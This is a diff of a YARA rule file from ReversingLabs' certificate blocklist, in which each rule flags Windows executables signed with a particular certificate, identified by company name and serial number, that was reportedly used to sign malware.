 		tags = "INFO, FILE"
@@ -19445,21 +41839,21 @@ rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRO SAT SRL" and pe.signatures [ i ] . serial == "0e:8a:a3:28:af:20:7c:e8:bc:ae:1d:c1:5c:62:61:88" and 1627344000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IT PUT LIMITED" and ( pe.signatures [ i ] . serial == "00:eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" or pe.signatures [ i ] . serial == "eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" ) and 1549238400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_61Da676C1Dcfcf188276E2C70D68082E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "844e295f-b22f-5eb0-9f98-0d6e574d2954"
+		id = "d974b740-38fa-564d-b4c6-8955568a4e77"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9148-L9166"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3140-L3156"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d8005774e6011d8198039a6588834cd0b13dd728103b63c3ea8b6e0dc3878f05"
+		logic_hash = "4f8af4a5c9812e6559218e387e32bc02cb0adcd40d9d4963fefc929f6101ae9a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19469,21 +41863,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sistema LLC" and ( pe.signatures [ i ] . serial == "00:cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" or pe.signatures [ i ] . serial == "cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" ) and 1627430400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "P2N ONLINE LTD" and pe.signatures [ i ] . serial == "61:da:67:6c:1d:cf:cf:18:82:76:e2:c7:0d:68:08:2e" and 1552723954 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_767436921B2698Bd18400A24B01341B6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "84140bbd-23a0-5355-9d1a-918cc93c3352"
+		id = "3e3b2b75-9416-5c4f-ad47-88f92039f532"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9168-L9184"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3158-L3174"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c9444ff9e13192bf300afac12554bc4cc2defb37bb5b57906b6163db378c515a"
+		logic_hash = "759bbbc5929463ad68d5dcd28b30401b9ff680f522172ed8d5d7dd3772e07587"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19493,21 +41887,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIA \"MWorx\"" and pe.signatures [ i ] . serial == "7e:bc:b5:4b:7e:0e:64:10:b2:86:10:de:07:43:d4:dd" and 1625616000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REBROSE LEISURE LIMITED" and pe.signatures [ i ] . serial == "76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" and 1556284480 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3E795531B3265510F935187Eca59920A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1ec81090-91a1-5019-be91-14f60d6722fc"
+		id = "953434f4-cc19-5a0a-923b-4deaadacef00"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9186-L9202"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3176-L3192"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "81e19c06de4546a2cee974230ef7aa15291f20f2e6b6f89c9b12107c26836b5e"
+		logic_hash = "d597e88314f9f20283b40058dd74167d0d72f7518277a57f26c15e44b670b386"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19517,21 +41911,21 @@ rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DMR Consulting Ltd." and pe.signatures [ i ] . serial == "01:10:6c:c2:93:77:2c:a9:05:a2:b6:ef:f0:2b:f0:f5" and 1627084800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "sasha catering ltd" and pe.signatures [ i ] . serial == "3e:79:55:31:b3:26:55:10:f9:35:18:7e:ca:59:92:0a" and 1557243644 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8F40B1485309A064A28B96Bfa3F55F36 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "82b2198e-140a-54d0-afa8-ad89980c7899"
+		id = "bad5b57e-185a-5872-9817-a7d688e24fe7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9204-L9220"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3194-L3212"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d2fcbce0826c1478338827376d2c7869e5b38dc6d5e737a2f986600c6f71b1e6"
+		logic_hash = "58dd47bfd2acd698bc27fb03eb51e4b8598ef6c71f7193e3cc4eea63982855f0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19541,21 +41935,21 @@ rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wellpro Impact Solutions Oy" and pe.signatures [ i ] . serial == "05:bb:16:2f:6e:fe:85:2b:7b:d4:71:2f:d7:37:a6:1e" and 1628726400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Singh Agile Content Design Limited" and ( pe.signatures [ i ] . serial == "00:8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" or pe.signatures [ i ] . serial == "8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" ) and 1542585600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B2120Facadbb92Cc0A176759604C6A0F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f81697ca-e49a-5a3d-9e0f-6192159e098b"
+		id = "8a90cc61-4d39-58eb-a102-c22d096d99ae"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9222-L9238"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3214-L3232"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e922bb850b7c5c70db80e6a2b99310eac48d3b10b94a7259899facd681916bfa"
+		logic_hash = "08462b1bd3d45824aeea901a4db19365c28d8b8b0f594657df7a59250111729b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19565,21 +41959,21 @@ rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OWLNET LIMITED" and pe.signatures [ i ] . serial == "61:71:99:0b:a1:c8:e7:10:49:eb:b2:96:a3:5b:d1:60" and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLON LTD" and ( pe.signatures [ i ] . serial == "00:b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" or pe.signatures [ i ] . serial == "b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" ) and 1554249600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4F407Eb50803845Cc43937823E1344C0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7d112cb8-a29f-5560-9c3c-cd8891623d96"
+		id = "6989cda1-f28e-58b7-8572-a7dc2e84d9e3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9240-L9256"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3234-L3250"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "241fe5a9f233fa36a665d22b38fd360bee21bc9832c15ac9c9d9b17adc3bb306"
+		logic_hash = "4d5a2b0619be902d8a437f204ae1b87222c73d3186930809b1f694bad429aea8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19589,21 +41983,21 @@ rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MATCH CONSULTANTS LTD" and pe.signatures [ i ] . serial == "21:14:ca:3b:d2:af:d6:3d:7f:a2:9d:74:49:92:b0:43" and 1625097600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW COOKED VENTURES LTD" and pe.signatures [ i ] . serial == "4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" and 1556555362 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6922Bb5De88E4127E1Ac6969E6A199F5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dd6dca76-ff5b-51a8-9318-20a88eb44ffb"
+		id = "86e16068-8b0b-5f0f-af5e-5ee9f518a915"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9258-L9274"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3252-L3268"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7ba7f69514230fe636efc0a12fb9ac489a5a80ca1f5bcdb050dd30ee8f69659c"
+		logic_hash = "39dbaa232ea9125934b3682d780e3821d12e771f2b844d027d99a432fe249d9f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19613,21 +42007,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Solar LLC" and pe.signatures [ i ] . serial == "6a:aa:62:20:8a:3a:78:bf:ac:14:43:00:7d:03:1e:61" and 1608163200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACHNA PLITKA, TOV" and pe.signatures [ i ] . serial == "69:22:bb:5d:e8:8e:41:27:e1:ac:69:69:e6:a1:99:f5" and 1552692162 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_73065Efa163B7901Fa1Ccb0A54E80540 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e6914a29-f6f7-56fc-8606-95666d31cf33"
+		id = "949f55a9-7aa0-50de-bb81-fed5d27c3d24"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9276-L9292"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3270-L3286"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "22b344b8befc00b0154d225603c81c6058399770f54cb6a09d0f7908c5c8188c"
+		logic_hash = "e420c37c04aa676c266a4c2c228063239815c173a83c39d426c5a674648f1934"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19637,21 +42031,21 @@ rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB9\\x9D\\xE6\\xB1\\x9F\\xE5\\xAE\\x8F\\xE5\\x9B\\xBE\\xE6\\x97\\xA0\\xE5\\xBF\\xA7\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "09:45:0b:8f:73:ea:43:e3:9d:2c:dd:56:04:9d:be:40" and 1561602110 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOVA CONSULTANCY LTD" and pe.signatures [ i ] . serial == "73:06:5e:fa:16:3b:79:01:fa:1c:cb:0a:54:e8:05:40" and 1548115200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4842Afad00904Ed8C98811E652Ccb3B7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7bd6616b-fef7-56aa-a78a-606601afa4f3"
+		id = "f09723aa-85a6-5d96-a71e-94f0e0a0f23c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9294-L9310"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3288-L3304"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8f8a5e3457c05c5e70e33041c5b0b971cf8f19313d47055fd760ed17d94c8794"
+		logic_hash = "2b5c7c13369c7b89f1ea5474de3644a12bf6412cb3fa8ade5b66de280fb10cbf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19661,21 +42055,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0e:fd:9b:d4:b4:28:1c:65:22:d9:60:11:df:46:c9:c4" and 1586249095 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"VERY EXCLUSIVE LTD\"" and pe.signatures [ i ] . serial == "48:42:af:ad:00:90:4e:d8:c9:88:11:e6:52:cc:b3:b7" and 1545177600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5A59A686B4A904D0Fca07153Ea6Db6Cc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d5e3d85b-cc4e-5522-8558-f2703c38c4e6"
+		id = "018e511f-191d-5fd4-8ab0-0e5bbff44d58"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9312-L9328"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3306-L3322"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d18a479f07f2bdb890437e2bcb0213abdfb0eb684cdaf17c5eb0583039f2edb4"
+		logic_hash = "7597b2ba870ec58ac0786a97fb92956406fe019c81f6176cc1a581988d3a9632"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19685,21 +42079,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0d:d7:d4:a7:85:99:05:84:d8:c0:83:76:59:17:32:72" and 1586249095 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABADAN PIZZA LTD" and pe.signatures [ i ] . serial == "5a:59:a6:86:b4:a9:04:d0:fc:a0:71:53:ea:6d:b6:cc" and 1563403380 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B6D8152F4A06Ba781C6677Eea5Ab74B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "969e05a1-8ae1-5ea6-9607-5bf164f34e7b"
+		id = "dacac5fe-00dc-5080-a725-9ef69473c45e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9330-L9346"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3324-L3340"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "32eea2a436f386ef44a00ef72be8be7d4070b02f84ba71c7ee1ca407fddce8ec"
+		logic_hash = "bd20cf8e4cab2117361dbe05ae2efe813e7f55667b1f3825cd893313d98dcb5f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19709,21 +42103,21 @@ rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0c:59:d4:65:80:f0:39:af:2c:4a:b6:ba:0f:fe:d1:97" and 1585108595 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLARYSOFT LTD" and pe.signatures [ i ] . serial == "0b:6d:81:52:f4:a0:6b:a7:81:c6:67:7e:ea:5a:b7:4b" and 1568246400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Ad60Cea73E1Dd1A3E6C02D9B339C380 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0c306a1f-e810-5988-a44c-964b6a67c918"
+		id = "80b39632-29a7-5932-a47b-736a9e8ed686"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9348-L9364"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3342-L3358"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "001556c31cfb0d94978adc48dc0d24c83666512348c65508975cc9e1a119aeae"
+		logic_hash = "fb83cf25be19e7cccd2c8369c3a37a90af72cb2f76db3619b8311d2a851335a8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19733,21 +42127,21 @@ rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "04:48:ec:8d:26:59:7f:99:91:21:38:50:0c:c4:1c:1b" and 1585108595 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUS Software GmbH" and pe.signatures [ i ] . serial == "3a:d6:0c:ea:73:e1:dd:1a:3e:6c:02:d9:b3:39:c3:80" and 1567036800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Df2Dfed47C6Fd6542131847Cffbc102 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2be3a0d2-2c6a-5c66-856a-d3a70a490ba3"
+		id = "306444d8-7573-58c6-b6fe-14d701942275"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9366-L9382"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3360-L3376"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "52027548e20c819e73ea5e9afd87faaca4498bc39e54dd30ad99a24e3ace57fd"
+		logic_hash = "fc6adbfd45ff6ac465aecb3db862421f02170e977fc044017f3ddc306a9f7a37"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
